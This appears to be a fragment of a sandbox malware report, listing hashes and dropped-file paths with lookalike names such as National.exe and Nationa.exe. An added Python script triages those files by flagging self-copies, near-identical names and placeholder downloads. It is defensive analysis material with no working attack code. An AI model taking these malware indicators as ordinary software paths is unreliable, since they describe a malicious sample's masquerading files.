SHA256 646963ad5c04da91513d63c1ed1638c7a09652101f3e251c74627155b59aaa9e
SHA512 f35044e38117c94ba597e2870ae1c3c8817aabf17e1ad8fe72364ab599a56418b4820f7b2f0b158d164fc02359b11a45ba719b45f7e5d2292bda7d11d92a8502

C:\Users\Admin\AppData\Local\Temp\2d0470f9.bat

MD5 1a1729b9c78ba685dd834728d5d383c0
SHA1 17f23ae8e3f8eac35ee7d5816e65b9635fe9c687
SHA256 7c61ece1721a691ecc98619b3562e283b2e531a32403d8533c1ede96a1a97c3a
SHA512 d2ae5a564c1da880a1aea5bc0d5c2143d32b71cff9cce0e32669dd5a1b372c663565baaabe605956419eb1f8d7f776b8ad302d0f671309c279fdf1f2d81a205f

memory/4044-106-0x0000000000600000-0x0000000000725000-memory.dmp
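An added triage pass over the Files list, example code that is not from the report: it flags entries whose digest matches the submitted sample (self-copies), file names within one edit of another listed name (National.exe against Nationa.exe), and entries whose digest equals that of a trivial body computed locally, which is how the k1[1].rar placeholder is recognised without any external lookup. The hashes are copied from the report; the set of trivial bodies is an assumption and can be extended.

```python
"""Triage of the Files list: self-copies, lookalike names, placeholder payloads (added example)."""
import hashlib
from itertools import combinations

SAMPLE_SHA256 = "ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9"

# Entries copied from the report's Files section (path, then one digest per line).
FILES = r"""
C:\Users\Admin\AppData\Local\Temp\aEHvt.exe
MD5 56b2c3810dba2e939a8bb9fa36d3cf96
SHA256 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

C:\ProgramData\National\National.exe
MD5 5646516f9069627c54a3878c3af85286
SHA256 ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\k1[1].rar
MD5 d3b07384d113edec49eaa6238ad5ff00
SHA256 b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c

C:\Windows\Temp\5EA418CE.exe
MD5 20879c987e2f9a916e578386d499f629
SHA256 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31

C:\ProgramData\Microsoft\National\Nationa.exe
MD5 3fe786058a5e426c151ac71566f504ae
SHA256 77255adc0910dc376f87f4db05849dc8a20c9e87ab181cf2ff513fc718c869bd
"""

# Bodies a download server hands back when it has nothing for you; extend as needed (assumption).
TRIVIAL_BODIES = {b"": "empty file", b"foo\n": "four bytes: 'foo' plus newline"}
TRIVIAL_SHA256 = {hashlib.sha256(body).hexdigest(): label for body, label in TRIVIAL_BODIES.items()}

def parse_files(text):
    """One dict per blank-line-separated block: path, base name and lower-cased digest fields."""
    entries = []
    for block in text.strip().split("\n\n"):
        lines = [l.strip() for l in block.strip().splitlines() if l.strip()]
        entry = {"path": lines[0], "name": lines[0].rsplit("\\", 1)[-1]}
        for line in lines[1:]:
            algo, digest = line.split(None, 1)
            entry[algo.lower()] = digest.lower()
        entries.append(entry)
    return entries

def copies_of_sample(entries, sample_sha256):
    """Paths whose content is byte-identical to the submitted sample."""
    return [e["path"] for e in entries if e.get("sha256") == sample_sha256]

def placeholder_payloads(entries):
    """Dropped files whose digest is that of a known trivial body, i.e. no real payload arrived."""
    return [(e["path"], TRIVIAL_SHA256[e["sha256"]]) for e in entries if e.get("sha256") in TRIVIAL_SHA256]

def levenshtein(a, b):
    """Edit distance (insert/delete/substitute), plain O(len(a)*len(b)) dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_names(entries, max_distance=1):
    """Pairs of different files whose names are within max_distance edits (case-insensitive)."""
    pairs = set()
    for a, b in combinations(entries, 2):
        na, nb = a["name"].lower(), b["name"].lower()
        if a.get("sha256") != b.get("sha256") and na != nb and levenshtein(na, nb) <= max_distance:
            pairs.add(tuple(sorted((a["name"], b["name"]))))
    return sorted(pairs)

if __name__ == "__main__":
    entries = parse_files(FILES)
    print("copies of sample:", copies_of_sample(entries, SAMPLE_SHA256))
    print("placeholder payloads:", placeholder_payloads(entries))
    print("lookalike names:", lookalike_names(entries))
```

The placeholder check is worth keeping in any dropped-file triage: a sandbox will happily hash whatever the server returned, and a four-byte stub with a .rar name looks like a payload until its digest is compared with the digests of trivial content.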